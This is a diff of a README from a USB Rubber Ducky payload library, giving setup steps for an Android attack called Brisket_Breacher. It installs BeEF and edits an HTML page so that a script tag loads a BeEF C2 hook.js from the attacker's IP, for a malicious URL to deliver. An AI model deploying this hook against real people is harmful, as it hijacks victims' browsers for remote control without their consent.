hak5/usbrubberducky-payloads/payloads/library/mobile/Android/Brisket_Breacher/README.md

 2. Install BeEF:
     - `sudo apt install beef-xss -y`

-3. Download the [homepage.html]() file (described next).
+3. Download the homepage.html file in the Brisket_Breacher directory (described next).
 This will be the homepage that our malicious URL will point to and deliver the BeEF C2 hook.
     - Open the homepage.html and edit the BeEF C2 hook (line 141 `<script src="http://X.X.X.X:3000/hook.js"></script>`) with the IP address gathered from `ifconfig` of the attacker machine and then save the updated file.
 E.g., `<script src="http://192.168.8.100:3000/hook.js"></script>`.
     - Become root: `sudo su`.
     - With the homepage.html file in your current working directory, move it to the following directory: `mv homepage.html /usr/share/beef-xss/extensions/demos/html`.